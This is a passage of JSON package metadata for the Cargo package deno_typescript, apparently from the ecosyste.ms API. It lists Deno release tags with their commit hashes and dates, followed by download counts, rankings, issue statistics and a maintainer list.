ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T15:22:18.447Z","dependent_packages_count":3,"downloads":79463,"downloads_period":"total","dependent_repos_count":15,"rankings":{"downloads":11.684534197623202,"dependent_repos_count":6.845235845848039,"dependent_packages_count":9.170226439345255,"stargazers_count":0.0022664944130912717,"forks_count":0.058173356602675974,"docker_downloads_count":null,"average":5.552087266766453},"purl":"pkg:cargo/deno_typescript","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_typescript","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_typescript","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_typescript/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecos